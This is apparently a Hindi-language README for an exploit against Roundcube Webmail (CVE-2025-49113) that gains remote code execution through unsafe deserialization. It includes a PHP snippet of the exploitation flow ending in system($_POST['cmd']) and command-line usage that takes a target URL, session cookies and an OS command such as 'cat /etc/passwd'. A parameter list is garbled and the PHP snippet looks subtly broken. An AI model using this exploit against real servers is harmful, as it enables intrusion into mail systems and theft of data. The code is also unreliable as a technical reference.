प्रमाणित रिमोट कोड निष्पादन शोषण Roundcube Webmail (CVE-2025-49113) के लिए असुरक्षित डिसिरियलाइज़ेशन के माध्यम से। इसमें सत्र इंजेक्शन, गैजेट चेन डिलीवरी, और शेल कमांड निष्पादन शामिल है।
CVE-2025-49113 Roundcube Webmail में एक गंभीर असुरक्षित डिसीरियलाइज़ेशन भेद्यता है जो प्रमाणित उपयोगकर्ताओं को दूरस्थ कोड निष्पादन में सक्षम बनाती है। यह भेद्यता फ़ाइल अपलोड संचालन के दौरान सीरियलाइज़्ड PHP ऑब्जेक्ट्स के अनुचित प्रबंधन से उत्पन्न होती है।
program/steps/mail/attach.inc में मौजूद_file पैरामीटर मेटाडेटा को संसाधित करता है_form पैरामीटर के माध्यम से PHP सत्र इंजेक्शनfilename पैरामीटर के माध्यम से दुर्भावनापूर्ण ऑब्जेक्ट इंजेक्शन_form पैरामीटर के माध्यम से सत्र हेरफेर इंजेक्ट करनाsystem() फ़ंक्शन का लाभ उठाना// Simplified exploitation flow
$target_url = $base_url . "?_task=mail&_action=upload&_form=injected_session_data";
$post_data = [
'_file' => '{"name":"malicious_object_gadget","path":"..."}',
'file' => curl_file_create('fake.png', 'image/png', 'exploit.png')
];
$response = curl_exec($target_url, $post_data);
// Vulnerable deserialization occurs in attach.inc processing
// Gadget chain triggers command execution: system($_POST['cmd']);
php CVE-2025-49113-exploit_cookies.php <url> <cookies> <command>
| पैरामीटर | विवरण | उदाहरण |
|---|---|---|
<url> | Roundcube इंस्टॉलेशन का बेस URL | https://mail.example.com/roundcube/ |
<cookies> | वैध सत्र कुकीज़ | roundcube_sessid=abc123; roundcube_sessauth=xyz456 |
<command> | निष्पादित करने के लिए OS कमांड | id या whoami |
php CVE-2025-49113-exploit_cookies.php \
https://mail.example.com/roundcube/ \
"roundcube_sessid=abc123; roundcube_sessauth=xyz456" \
"cat /etc/passwd"
यह जानकारी केवल शैक्षिक उद्देश्यों के लिए प्रदान की गई है। स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध अनधिकृत परीक्षण अवैध है। सुरक्षा मूल्यांकन करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें। लेखक और प्रकाशक इस जानकारी के किसी भी दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेते हैं।